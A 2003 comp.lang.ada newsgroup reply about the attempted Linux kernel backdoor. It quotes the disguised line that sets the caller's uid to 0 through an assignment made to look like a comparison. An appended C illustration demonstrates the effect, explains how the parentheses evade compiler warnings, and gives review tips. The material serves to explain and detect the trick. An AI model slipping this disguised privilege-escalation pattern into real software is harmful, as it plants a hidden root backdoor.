From: Vinzent 'Gadget' Hoefler
Newsgroups: comp.lang.ada
Subject: Re: C's trikery semantic opens up backdoor in new Linux kernel
Date: Wed, 12 Nov 2003 08:18:27 +0100
Organization: JeLlyFish software
References: <3FB1A63C.9080200@nowhere.com> <8Eisb.14119$hB5.9208@nwrdny02.gnilink.net>
Reply-To: v.hoefler@acm.org

J Cusick wrote:

>On Wed, 12 Nov 2003 04:26:44 +0000, Stephane Richard wrote:
>
>> For some reason, I can't open that link you posted here..
>
>The Register site seems to be down at the moment... The link is good.
>
>The article discusses the fact that someone tried to slide in a C line
>(actually 2 lines) that trashed the tcp stack allowing a negative offset

No. It is worse than that. The interesting line in question is this one:

|if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

First this looks like a sanity check. But look closer. This single line
serves one single purpose: to give you root privileges when you just
pass the right flags.

Note the "current->uid = 0" instead of "current->uid == 0". Who the hell
had the fucking bad idea that assignments could return values?

Let's stretch the example and imagine it was just a simple typo of a
tired programmer who wrote the PIN-code checking routine for an ATM and
it slipped through the review...

Vinzent.
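The following is an added illustration of the C semantics the post is complaining about; it is not code from the post or from the kernel. The flag values and the `struct task` stand-in are constructed for the example and are not the real kernel definitions. It places the `=` form next to the `==` form so the two observable effects can be checked side by side: with `=`, the rejection branch can never be taken (the assignment evaluates to 0), and `uid` is silently overwritten whenever the left-hand operand of `&&` is true. Note that the extra parentheses around the assignment are exactly what keeps gcc's `-Wparentheses` (enabled by `-Wall`) quiet, so a warning-clean build is no evidence that this pattern is absent.

```c
#include <stdio.h>
#include <stdbool.h>

/* Constructed flag values for the example (hypothetical, not the kernel's). */
#define WCLONE_FLAG 0x80000000u
#define WALL_FLAG   0x40000000u

/* Minimal stand-in for the kernel's task structure (hypothetical). */
struct task {
    unsigned int uid;   /* 0 means root */
};

/* The pattern from the quoted line: `=` where `==` was meant.
 * Returns true when the "sanity check" would reject the call.
 * Because (current->uid = 0) assigns 0 and evaluates to 0, the whole
 * condition is always false: the rejection never fires, but uid has
 * been set to 0 whenever the flags matched.  The parentheses around
 * the assignment suppress gcc's -Wparentheses warning. */
bool check_with_assignment(unsigned int options, struct task *current)
{
    if ((options == (WCLONE_FLAG | WALL_FLAG)) && (current->uid = 0)) {
        return true;
    }
    return false;
}

/* The same check with the comparison the author says was intended:
 * uid is only read, never written. */
bool check_with_comparison(unsigned int options, struct task *current)
{
    if ((options == (WCLONE_FLAG | WALL_FLAG)) && (current->uid == 0)) {
        return true;
    }
    return false;
}

int main(void)
{
    struct task a = { 1000 };
    struct task b = { 1000 };
    unsigned int flags = WCLONE_FLAG | WALL_FLAG;

    bool ra = check_with_assignment(flags, &a);
    bool rb = check_with_comparison(flags, &b);

    printf("assignment form: rejected=%d uid afterwards=%u\n", ra, a.uid);
    printf("comparison form: rejected=%d uid afterwards=%u\n", rb, b.uid);
    return 0;
}
```

Running it shows the assignment form reporting "rejected=0" while the uid has dropped from 1000 to 0, and the comparison form leaving the uid untouched. In review, the tell is a condition whose right-hand operand is a parenthesised assignment; a style rule of writing the constant on the left (`0 == current->uid`) turns the same typo into a compile error instead of a silent privilege change.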